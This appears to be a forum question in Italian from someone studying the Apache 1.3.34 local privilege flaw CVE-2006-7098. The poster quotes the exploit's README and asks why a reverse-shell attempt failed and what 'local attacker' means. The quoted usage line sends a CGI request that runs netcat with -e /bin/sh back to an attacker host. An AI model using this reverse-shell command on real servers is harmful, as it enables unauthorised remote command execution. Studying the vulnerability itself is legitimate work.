Sto studiando le vulnerabilità di una vecchia versione di Apache, la 1.3.34. E non capisco in quale esatta situazione si possa sfruttare la vulnerabilità CVE 2006-7098. Il README incluso nell'exploit afferma che:
Local attacker can influence Apache to direct commands into an open tty owned by user who started apache process, usually root. This results in arbitrary command execution. Notes: Must have CGI execution privileges and service started manually by root via shell.
Usage: nc -vvv -l -p 31337 http://webserver/cgi-bin/cgipwn?nc%20myhost%2031337%20-e%20%2fbin%2f/sh%0d
All'inizio ho capito che la vulnerabilità poteva essere sfruttata da un'altra macchina nella stessa rete del server vulnerabile. Quindi da questa altra macchina (attaccante) I:
- ha compilato l'exploit cgipwn e l'ha installato nel cgi-bin del file attacker machine apache.
- ha eseguito il comando nc dalla macchina attaccante specificando -p come la porta in cui l'apache dell'attaccante ascolta, webserver come IP della macchina attaccante e myhost come server con la vulnerabilità.
Ma non ci sono riuscito: il comando non restituisce nulla.
Quindi, dopo aver riletto più volte le informazioni sugli exploit, ho alcuni dubbi sulla frase attacker locale : significa che la vulnerabilità può essere sfruttata solo dalla stessa macchina in cui è vulnerabile Apache in esecuzione? In questo caso capisco che l'autore dell'attacco dovrebbe avere a priori le credenziali di un utente valido nella macchina con le autorizzazioni per gestire l'apache (il che ridurrebbe parecchio l'applicabilità dell'attacco).
Qualcuno potrebbe far luce su questo?